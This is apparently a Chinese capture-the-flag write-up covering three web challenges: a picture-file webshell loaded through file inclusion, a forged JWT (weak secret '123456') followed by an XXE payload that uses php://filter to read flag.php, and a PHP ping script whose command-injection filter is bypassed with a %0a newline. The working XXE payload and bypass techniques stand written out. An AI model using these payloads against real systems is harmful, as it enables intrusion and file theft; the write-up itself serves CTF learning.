web3
看题目介绍,感觉应该是文件上传
果然是文件上传
这里来看的话应该是文件包含漏洞,因为之前我上传php无法绕过只能上传图片
我们首先上传图片马,不做任何绕过操作
然后用文件包含包含这个图片马
不知道为什么菜刀连不上
我们直接用hackbar,或者用burp来读取flag,因为我写的一句话是post传参的
我们cat flag.php
右键查看源代码
这题之前被好多大佬恶搞,比如禁权限。。。。。心累
web4
打开题目,没啥发现,抓包看一下
一看到Cookie: token=,应该是伪造jwt
伪造jwt的网站
https://jwt.io/#encoded-jwt
我们把guest改成user
secret是123456
我们修改之后返回页面
发现有一个登陆页面
我们用弱密码登陆一下
抓包之后
可以看出是一个xxe漏洞,我们可以利用xxe漏洞来读取任意文件
我们构造好xxe的格式,发现我们是可以读取到系统文件的,此时我们读一下flag.php
我们发现读取不到php文件
因为PHP的代码可能因为浏览器会解析的原因导致无法显示
我们此时用base64编码来显示
token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Imd1ZXN0IiwiaWF0IjoxNTg4ODEwODUyLCJqdGkiOiI4MGRlOGFjZGFlMzY5MjZiYWMyMGZmYzkxYTc5MzM5OSJ9.xnFkT2CQ_FC-0UkeLatqpviYCVEW_EpLUVQe8eMO62w
<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<user><username>&f;</username><password>123456</password></user>
我们用base64编码解码一下
<?php $PASSWORD = 'flag{get_the_methodd}'; ?>发现了flag
阿帅的爱情
找到网址,加上端口7013
发现是个代码审计,代码如下
<?php
if(!isset($_GET["ip"])){
show_source(__file__);
} else
{
$ip=$_GET["ip"];
$pattern="/[;|&].*[a-zA-Z]+/";
if(preg_match($pattern,$ip)!=0){
die('bad domain');
}
try {
$result = shell_exec('ping -c 4 ' . $ip);
}
catch(Exception $e) {
$result = $e->getMessage();
echo $result;
}
$result = str_replace("\n", "<br>", $result);
echo $result;
}
是个命令执行漏洞,唯一的过滤就是正则,直接用%0a绕过
发现有个flag.php,读取就是
今天看了看,,,,,,竟然结束了。。。。。好多WEB还没写复现过程。。。。环境就关了